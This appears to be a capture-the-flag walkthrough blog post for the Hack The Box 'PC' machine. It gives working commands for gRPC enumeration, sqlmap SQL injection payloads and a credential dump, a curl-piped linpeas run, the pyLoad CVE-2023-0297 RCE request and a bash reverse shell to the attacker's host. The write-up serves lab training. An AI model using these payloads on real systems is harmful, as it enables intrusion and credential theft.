Hey there, Cyber Warriors! đ
Cracking the code, stepping into the mind of the creator, and uncovering secrets no one else has discovered yet â this is the thrill of Capture The Flag (CTF) challenges, and today I’ll take you on a fascinating journey through one of the most compelling tasks in Hack The Box: ‘PC’. This isn’t your typical challenge; ‘PC’ takes you to new heights, pushing you to explore not only the common low ports but also the less-traveled terrain of high ports.
The first step we will do is perform a new scan with NMAP to discover which kind of ports and services could be running into the objetive:
sudo nmap -sT -n -Pn -sV -T4 -v 10.10.11.214
The result of the scan we have performed is weird because we just discovered one port open:
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
To gather more information about this machine, we will perform a new scan but over all possible ports:
sudo nmap -sT -n -Pn -sV -p- -v 10.10.11.214
Now, we have discovered a new port â50051â:
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
50051/tcp open unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at <https://nmap.org/cgi-bin/submit.cgi?new-service> :
SF-Port50051-TCP:V=7.93%I=7%D=5/31%Time=64767908%P=x86_64-pc-linux-gnu%r(N
SF:ULL,2E,"\\0\\0\\x18\\x04\\0\\0\\0\\0\\0\\0\\x04\\0\\?\\xff\\xff\\0\\x05\\0\\?\\xff\\xff\\0\\x0
SF:6\\0\\0\\x20\\0\\xfe\\x03\\0\\0\\0\\x01\\0\\0\\x04\\x08\\0\\0\\0\\0\\0\\0\\?\\0\\0")%r(Generic
SF:Lines,2E,"\\0\\0\\x18\\x04\\0\\0\\0\\0\\0\\0\\x04\\0\\?\\xff\\xff\\0\\x05\\0\\?\\xff\\xff\\0\\
SF:x06\\0\\0\\x20\\0\\xfe\\x03\\0\\0\\0\\x01\\0\\0\\x04\\x08\\0\\0\\0\\0\\0\\0\\?\\0\\0")%r(GetRe
SF:quest,2E,"\\0\\0\\x18\\x04\\0\\0\\0\\0\\0\\0\\x04\\0\\?\\xff\\xff\\0\\x05\\0\\?\\xff\\xff\\0\\
SF:x06\\0\\0\\x20\\0\\xfe\\x03\\0\\0\\0\\x01\\0\\0\\x04\\x08\\0\\0\\0\\0\\0\\0\\?\\0\\0")%r(HTTPO
SF:ptions,2E,"\\0\\0\\x18\\x04\\0\\0\\0\\0\\0\\0\\x04\\0\\?\\xff\\xff\\0\\x05\\0\\?\\xff\\xff\\0
SF:\\x06\\0\\0\\x20\\0\\xfe\\x03\\0\\0\\0\\x01\\0\\0\\x04\\x08\\0\\0\\0\\0\\0\\0\\?\\0\\0")%r(RTSP
SF:Request,2E,"\\0\\0\\x18\\x04\\0\\0\\0\\0\\0\\0\\x04\\0\\?\\xff\\xff\\0\\x05\\0\\?\\xff\\xff\\
SF:0\\x06\\0\\0\\x20\\0\\xfe\\x03\\0\\0\\0\\x01\\0\\0\\x04\\x08\\0\\0\\0\\0\\0\\0\\?\\0\\0")%r(RPC
SF:Check,2E,"\\0\\0\\x18\\x04\\0\\0\\0\\0\\0\\0\\x04\\0\\?\\xff\\xff\\0\\x05\\0\\?\\xff\\xff\\0\\
SF:x06\\0\\0\\x20\\0\\xfe\\x03\\0\\0\\0\\x01\\0\\0\\x04\\x08\\0\\0\\0\\0\\0\\0\\?\\0\\0")%r(DNSVe
SF:rsionBindReqTCP,2E,"\\0\\0\\x18\\x04\\0\\0\\0\\0\\0\\0\\x04\\0\\?\\xff\\xff\\0\\x05\\0\\?\\
SF:xff\\xff\\0\\x06\\0\\0\\x20\\0\\xfe\\x03\\0\\0\\0\\x01\\0\\0\\x04\\x08\\0\\0\\0\\0\\0\\0\\?\\0\\0
SF:")%r(DNSStatusRequestTCP,2E,"\\0\\0\\x18\\x04\\0\\0\\0\\0\\0\\0\\x04\\0\\?\\xff\\xff\\0
SF:\\x05\\0\\?\\xff\\xff\\0\\x06\\0\\0\\x20\\0\\xfe\\x03\\0\\0\\0\\x01\\0\\0\\x04\\x08\\0\\0\\0\\0\\
SF:0\\0\\?\\0\\0")%r(Help,2E,"\\0\\0\\x18\\x04\\0\\0\\0\\0\\0\\0\\x04\\0\\?\\xff\\xff\\0\\x05\\0
SF:\\?\\xff\\xff\\0\\x06\\0\\0\\x20\\0\\xfe\\x03\\0\\0\\0\\x01\\0\\0\\x04\\x08\\0\\0\\0\\0\\0\\0\\?\\
SF:0\\0")%r(SSLSessionReq,2E,"\\0\\0\\x18\\x04\\0\\0\\0\\0\\0\\0\\x04\\0\\?\\xff\\xff\\0\\x0
SF:5\\0\\?\\xff\\xff\\0\\x06\\0\\0\\x20\\0\\xfe\\x03\\0\\0\\0\\x01\\0\\0\\x04\\x08\\0\\0\\0\\0\\0\\0
SF:\\?\\0\\0")%r(TerminalServerCookie,2E,"\\0\\0\\x18\\x04\\0\\0\\0\\0\\0\\0\\x04\\0\\?\\xf
SF:f\\xff\\0\\x05\\0\\?\\xff\\xff\\0\\x06\\0\\0\\x20\\0\\xfe\\x03\\0\\0\\0\\x01\\0\\0\\x04\\x08\\0
SF:\\0\\0\\0\\0\\0\\?\\0\\0")%r(TLSSessionReq,2E,"\\0\\0\\x18\\x04\\0\\0\\0\\0\\0\\0\\x04\\0\\?
SF:\\xff\\xff\\0\\x05\\0\\?\\xff\\xff\\0\\x06\\0\\0\\x20\\0\\xfe\\x03\\0\\0\\0\\x01\\0\\0\\x04\\x0
SF:8\\0\\0\\0\\0\\0\\0\\?\\0\\0")%r(Kerberos,2E,"\\0\\0\\x18\\x04\\0\\0\\0\\0\\0\\0\\x04\\0\\?\\x
SF:ff\\xff\\0\\x05\\0\\?\\xff\\xff\\0\\x06\\0\\0\\x20\\0\\xfe\\x03\\0\\0\\0\\x01\\0\\0\\x04\\x08\\
SF:0\\0\\0\\0\\0\\0\\?\\0\\0")%r(SMBProgNeg,2E,"\\0\\0\\x18\\x04\\0\\0\\0\\0\\0\\0\\x04\\0\\?\\x
SF:ff\\xff\\0\\x05\\0\\?\\xff\\xff\\0\\x06\\0\\0\\x20\\0\\xfe\\x03\\0\\0\\0\\x01\\0\\0\\x04\\x08\\
SF:0\\0\\0\\0\\0\\0\\?\\0\\0")%r(X11Probe,2E,"\\0\\0\\x18\\x04\\0\\0\\0\\0\\0\\0\\x04\\0\\?\\xff
SF:\\xff\\0\\x05\\0\\?\\xff\\xff\\0\\x06\\0\\0\\x20\\0\\xfe\\x03\\0\\0\\0\\x01\\0\\0\\x04\\x08\\0\\
SF:0\\0\\0\\0\\0\\?\\0\\0");
We need to search some information about the port and we can say this port is usually used for gRPC service.
What is gRPC?
gRPC (Google Remote Procedure Call) is an open-source high-performance RPC
(Remote Procedure Call) framework developed by Google. It can run in any
environment and allows for communication between services in a variety of
ways. Its use of HTTP/2 for transport and Protocol Buffers for message
serialization allows for fast, efficient communication between client and
server.
After searching more information about how we can interact with this service I found this article by Microsoft:
https://learn.microsoft.com/en-us/aspnet/core/grpc/test-tools?view=aspnetcore-7.0
The article shows how we can use different tools to interact with the gRPC service. In my case I selected âgrpculâ tool. We can find more information in GitHub (https://github.com/fullstorydev/grpcurl). Now we can download the tool in our Kali Linux through the next link:
https://github.com/fullstorydev/grpcurl/releases
Let’s try to discover more information with grpcurl:
./grpcurl 10.10.11.214:50051 describe
Failed to dial target host "10.10.11.214:50051": tls: first record does not look like a TLS handshake
We need to force the plain text connection with grpcurl:
./grpcurl -plaintext 10.10.11.214:50051 describe
SimpleApp is a service:
service SimpleApp {
rpc LoginUser ( .LoginUserRequest ) returns ( .LoginUserResponse );
rpc RegisterUser ( .RegisterUserRequest ) returns ( .RegisterUserResponse );
rpc getInfo ( .getInfoRequest ) returns ( .getInfoResponse );
}
grpc.reflection.v1alpha.ServerReflection is a service:
service ServerReflection {
rpc ServerReflectionInfo ( stream .grpc.reflection.v1alpha.ServerReflectionRequest ) returns ( stream .grpc.reflection.v1alpha.ServerReflectionResponse );
}
We discovered new information. We can see that the server has an application running named âSimpleAppâ and we can interact through different methods. Now, we will see which kind of data we need to send through each method:
- LoginUser: Method for login into the application with âusernameâ and âpasswordâ params.
./grpcurl -plaintext 10.10.11.214:50051 describe LoginUserRequest
LoginUserRequest is a message:
message LoginUserRequest {
string username = 1;
string password = 2;
}
- RegisterUser: Method for register user into the application with âusernameâ and âpasswordâ params.
./grpcurl -plaintext 10.10.11.214:50051 describe RegisterUserRequest
RegisterUserRequest is a message:
message RegisterUserRequest {
string username = 1;
string password = 2;
}
- GetInfo: Method for get information about some user with âidâ param.
./grpcurl -plaintext 10.10.11.214:50051 describe getInfoRequest
getInfoRequest is a message:
message getInfoRequest {
string id = 1;
}
In this point we can check the âgetInfoâ method with an example âidâ to know some more information:
./grpcurl -d '{"id":"1"}' -plaintext 10.10.11.214:50051 SimpleApp/getInfo
We will receive some error from the application, might be we will need some authentication token:
{
"message": "Authorization Error.Missing 'token' header"
}
We will try to create a new user. It could be a solution to check information about other users into the application or just to log into it:
./grpcurl -d '{"username":"example", "password":"example"}' -vv -plaintext 10.10.11.214:50051 SimpleApp/RegisterUser
Resolved method descriptor:
rpc RegisterUser ( .RegisterUserRequest ) returns ( .RegisterUserResponse );
Request metadata to send:
(empty)
Response headers received:
content-type: application/grpc
grpc-accept-encoding: identity, deflate, gzip
Estimated response size: 35 bytes
Response contents:
{
"message": "Account created for user example!"
}
Response trailers received:
(empty)
Sent 1 request and received 1 response
After creating our new user we will try to connect to this application to get more information about our new user:
./grpcurl -d '{"username":"example", "password":"example"}' -vv -plaintext 10.10.11.214:50051 SimpleApp/LoginUser
Apparently we can log in with the new user we have created and after logging in with new user we will receive important information like the token to use the method âgetInfoâ:
Resolved method descriptor:
rpc LoginUser ( .LoginUserRequest ) returns ( .LoginUserResponse );
Request metadata to send:
(empty)
Response headers received:
content-type: application/grpc
grpc-accept-encoding: identity, deflate, gzip
Estimated response size: 17 bytes
Response contents:
{
"message": "Your id is 706."
}
Response trailers received:
token: b'eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiZXhhbXBsZSIsImV4cCI6MTY4NTcxMjYxOX0.PLDt1weY4ozJzlgZ_sngkh0hAWhqZ9K0ufeXNOA8rVg'
Sent 1 request and received 1 response
Now, we can get more information through the âgetInfoâ method:
./grpcurl -d '{"id":"706"}' -H 'token:eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiZXhhbXBsZSIsImV4cCI6MTY4NTcxMjYxOX0.PLDt1weY4ozJzlgZ_sngkh0hAWhqZ9K0ufeXNOA8rVg' -vv -plaintext 10.10.11.214:50051 SimpleApp/getInfo
But something happened and we will receive the next message from the application:
Resolved method descriptor:
rpc getInfo ( .getInfoRequest ) returns ( .getInfoResponse );
Request metadata to send:
token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiZXhhbXBsZSIsImV4cCI6MTY4NTcxMjYxOX0.PLDt1weY4ozJzlgZ_sngkh0hAWhqZ9K0ufeXNOA8rVg
Response headers received:
content-type: application/grpc
grpc-accept-encoding: identity, deflate, gzip
Estimated response size: 19 bytes
Response contents:
{
"message": "Will update soon."
}
Response trailers received:
(empty)
Sent 1 request and received 1 response
But if we try with the âIDâ 1 we will see this message:
./grpcurl -d '{"id":"1"}' -H 'token:eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiZXhhbXBsZSIsImV4cCI6MTY4NTcxMjYxOX0.PLDt1weY4ozJzlgZ_sngkh0hAWhqZ9K0ufeXNOA8rVg' -plaintext 10.10.11.214:50051 SimpleApp/getInfo
{
"message": "The admin is working hard to fix the issues."
}
In this point we will try to check the service with another tool. We will use âgrpcuiâ. This tools provide us one way to interact with âgRPCâ service but with user interface. We can download it through GitHub âhttps://github.com/fullstorydev/grpcui/releasesâ. After download the tool, we will create a new session to can interact with âgRPCâ:
./grpcui -plaintext 10.10.11.214:50051
After execute the command we will see the grpcui user interface to interact with the âgRPCâ service. The next point is try to capture the âgetInfoâ request to modify our petition and finally try to inject something:
Once we have completed our request, the next step is redirect it to burp suite with the navigator plugin âFoxy Proxyâ. Before use it we need to configure our proxy into the configuration plugin:
Now we already have the request in our burp suite and we will try some sql injection. Why? because if you do your own research about this service is usually vulnerable a sql injection:
Now we going to send our request to the functionality âRepeaterâ to save this request as file:
Now we have our request already saved:
Now we will perform a scan with sqlmap to try found some sql injection:
sudo sqlmap -r pc.req
After performing our scan we will see that the application is vulnerable to SQL Injection through the param âidâ:
Parameter: JSON id ((custom) POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: {"metadata":[{"name":"token","value":"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiZXhhbXBsZSIsImV4cCI6MTY4NTcxMjYxOX0.PLDt1weY4ozJzlgZ_sngkh0hAWhqZ9K0ufeXNOA8rVg"}],"data":[{"id":"1 AND 8736=8736"}]}
Type: time-based blind
Title: SQLite > 2.0 AND time-based blind (heavy query)
Payload: {"metadata":[{"name":"token","value":"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiZXhhbXBsZSIsImV4cCI6MTY4NTcxMjYxOX0.PLDt1weY4ozJzlgZ_sngkh0hAWhqZ9K0ufeXNOA8rVg"}],"data":[{"id":"1 AND 4960=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2))))"}]}
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: {"metadata":[{"name":"token","value":"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiZXhhbXBsZSIsImV4cCI6MTY4NTcxMjYxOX0.PLDt1weY4ozJzlgZ_sngkh0hAWhqZ9K0ufeXNOA8rVg"}],"data":[{"id":"-4905 UNION ALL SELECT CHAR(113,122,122,113,113)||CHAR(81,101,109,108,117,118,88,107,120,77,88,108,82,76,75,89,112,66,109,71,83,74,119,104,100,110,110,74,74,77,78,122,78,86,122,80,111,81,104,105)||CHAR(113,98,98,106,113)-- hDmD"}]}
Now, we already known that the application is vulnerable and we going to enumerate the tables of this database:
sudo sqlmap -r pc.req -T SQLite --tables
We will receive two tables:
[13:16:57] [INFO] fetching tables for database: 'SQLite_masterdb'
<current>
[2 tables]
+----------+
| accounts |
| messages |
+----------+
We found the accounts tables. We can dump the accounts information with âsqlmapâ too:
sudo sqlmap -r pc.req -T SQLite -T accounts --dump
We will receive user and password we can use it with SSH:
Database: <current>
Table: accounts
[2 entries]
+------------------------+----------+
| password | username |
+------------------------+----------+
| admin | admin |
| REPLACED | REPLACED |
+------------------------+----------+
Now we can check if we can connect through SSH with the credentials we already have discovered:
ââ$ ssh sau@10.10.11.214
Finally, we can reach the user flag:
Now we will enumerate this machine with Linpeas but first we will turn on our http server to transfer the script into the machine:
sudo python3 -m http.server 80
Now, we can execute the next command to execute linpeas in memory:
curl <http://10.10.16.64/linpeas.sh> | sh >> linpeas.log
We can see the next processes running in the server:
âââââââââââ⣠Cleaned processes
â Check weird & unexpected proceses run by root: <https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes>
root 486 0.0 0.0 2488 512 ? S 05:36 0:00 _ bpfilter_umh
root 1 0.0 0.2 167996 11532 ? Ss 05:36 0:02 /sbin/init
root 464 0.3 2.0 163632 80964 ? S<s 05:36 0:25 /lib/systemd/systemd-journald
root 514 0.0 0.1 20176 5864 ? Ss 05:36 0:00 /lib/systemd/systemd-udevd
systemd+ 534 0.0 0.1 19080 7608 ? Ss 05:36 0:00 /lib/systemd/systemd-networkd
ââ(Caps) 0x0000000000003c00=cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw
root 679 0.0 0.4 280192 18004 ? SLsl 05:36 0:00 /sbin/multipathd -d -s
root 707 0.0 0.0 11356 1680 ? S<sl 05:36 0:00 /sbin/auditd
root 738 0.0 0.2 49296 10444 ? Ss 05:36 0:00 /usr/bin/VGAuthService
root 739 0.1 0.2 239496 8092 ? Ssl 05:36 0:10 /usr/bin/vmtoolsd
root 770 0.0 0.1 99900 5980 ? Ssl 05:36 0:00 /sbin/dhclient -1 -4 -v -i -pf /run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.eth0.leases -I -df /var/lib/dhcp/dhclient6.eth0.leases eth0
root 819 0.0 0.2 241052 9180 ? Ssl 05:36 0:03 /usr/lib/accountsservice/accounts-daemon
message+ 820 0.0 0.1 7572 4436 ? Ss 05:36 0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
ââ(Caps) 0x0000000020000000=cap_audit_write
root 833 0.0 0.0 81956 3648 ? Ssl 05:36 0:00 /usr/sbin/irqbalance --foreground
root 834 0.0 0.4 29876 18312 ? Ss 05:36 0:00 /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers
root 835 0.0 0.2 236440 9040 ? Ssl 05:36 0:00 /usr/lib/policykit-1/polkitd --no-debug
syslog 836 0.2 0.1 224344 5352 ? Ssl 05:36 0:16 /usr/sbin/rsyslogd -n -iNONE
root 838 0.0 1.0 875264 41940 ? Ssl 05:36 0:01 /usr/lib/snapd/snapd
root 839 0.0 0.1 17492 7760 ? Ss 05:36 0:00 /lib/systemd/systemd-logind
root 841 0.0 0.3 395492 13836 ? Ssl 05:36 0:00 /usr/lib/udisks2/udisksd
root 886 0.0 0.3 318824 13412 ? Ssl 05:36 0:00 /usr/sbin/ModemManager
root 1054 0.4 0.7 634840 31420 ? Ssl 05:36 0:35 /usr/bin/python3 /opt/app/app.py
root 1060 0.0 1.5 1221072 62468 ? Ssl 05:36 0:06 /usr/bin/python3 /usr/local/bin/pyload
root 1073 0.0 0.0 8540 2940 ? Ss 05:36 0:00 /usr/sbin/cron -f
daemon[0m 1077 0.0 0.0 3796 2276 ? Ss 05:36 0:00 /usr/sbin/atd -f
root 1082 0.0 0.0 5828 1984 tty1 Ss+ 05:36 0:00 /sbin/agetty -o -p -- u --noclear tty1 linux
sau 1714 0.0 0.1 13960 6088 ? S 06:11 0:00 | _ sshd: sau@pts/1
sau 1715 0.0 0.1 9988 5012 pts/1 Ss+ 06:11 0:00 | _ -bash
sau 2196 0.0 0.1 13964 5304 ? S 07:39 0:00 _ sshd: sau@pts/0
sau 2197 0.0 0.1 9988 4936 pts/0 Ss 07:39 0:00 _ -bash
sau 2224 0.0 0.2 26536 10856 pts/0 S+ 07:45 0:00 _ curl <http://10.10.16.64/linpeas.sh>
sau 2225 0.4 0.0 3532 2728 pts/0 S+ 07:45 0:00 _ sh
sau 5451 0.0 0.0 3532 1020 pts/0 S+ 07:46 0:00 _ sh
sau 5455 0.0 0.0 10952 3616 pts/0 R+ 07:46 0:00 | _ ps fauxwww
sau 5454 0.0 0.0 3532 1020 pts/0 S+ 07:46 0:00 _ sh
systemd+ 1279 0.0 0.3 24448 12172 ? Ss 05:42 0:00 /lib/systemd/systemd-resolved
sau 1356 0.0 0.2 19104 9844 ? Ss 05:43 0:00 /lib/systemd/systemd --user
sau 1359 0.0 0.0 169352 3388 ? S 05:43 0:00 _ (sd-pam)
sau 5342 0.0 0.1 7108 4088 ? Ss 07:45 0:00 _ /usr/bin/dbus-daemon[0m --session --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
We can see some listen ports:
âââââââââââ⣠Active Ports
â <https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports>
tcp 0 0 127.0.0.1:8000 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:9666 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp6 0 0 :::50051 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
In this point we will try to reach the port 8000 to see which kind of service is running:
sau@pc:~$ curl <http://127.0.0.1:8000>
We can see it is some kind of application web and we can follow the next âurlâ:
<!doctype html>
<html lang=en>
<title>Redirecting...</title>
<h1>Redirecting...</h1>
<p>You should be redirected automatically to the target URL: <a href="/login?next=http%3A%2F%2F127.0.0.1%3A8000%2F">/login?next=http%3A%2F%2F127.0.0.1%3A8000%2F</a>. If not, click the link.
We can check the next URL:
sau@pc:~$ curl <http://127.0.0.1:8000/login>
We will find login for PyLoad. After this we will search more information in google and we will find this post to exploit RCE in this service:
https://github.com/bAuh0lz/CVE-2023-0297_Pre-auth_RCE_in_pyLoad
Also an exploit code:
sau@pc:~$ curl -i -s -k -X $'POST' \\
--data-binary $'jk=pyimport%20os;os.system(\\"touch%20/tmp/pwnd\\");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa' \\
$'http://<target>/flash/addcrypted2'
We will try to execute a reverse shell through this exploit. First of all we can use https://www.revshells.com. I have selected this reverse shell:
#!/bin/bash
/bin/bash -i >& /dev/tcp/10.10.16.64/9000 0>&1
Add execution permission:
sau@pc:~$ chmod +x rv.sh
After creating our reverse shell we will need to turn on our netcat server:
sudo nc -nlvp 9000
Now, we can modify the exploit code to execute our reverse shell (execute into the session SSH):
sau@pc:~$ curl -i -s -k -X $'POST' \\
--data-binary $'jk=pyimport%20os;os.system(\\"bash%20/tmp/rv.sh\\");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa' \\
$'<http://localhost:8000/flash/addcrypted2>'
Finally, we have obtained our connection with root privileges:
The next step is obtain the root flag!
In closing, I would like to emphasize that the realm of cyber security is a constantly evolving landscape. As we venture through this dynamic world, it’s important to continue learning and adapting. Each Capture The Flag challenge, each line of code, each high port we encounter serves as a reminder that there’s always more to learn.
Remember, enumeration isn’t just about counting; it’s about understanding, getting into the minutiae of systems, and revealing hidden vulnerabilities. It’s through meticulous probing and exploration that we truly get to the heart of the system. Injections aren’t merely exploits, but valuable lessons in recognizing and mitigating risks.
In our journey to secure cyberspace, it’s our curiosity and persistence that drive us forward. It’s about asking the right questions, cracking the code, and leaving no stone unturned. As we step into tomorrow, let’s continue to challenge assumptions, elevate our knowledge, and shape the future of cyber security.
Remember, the greatest weapon in the world of cyber security is knowledge. Stay curious, stay vigilant, and most importantly, never stop learning.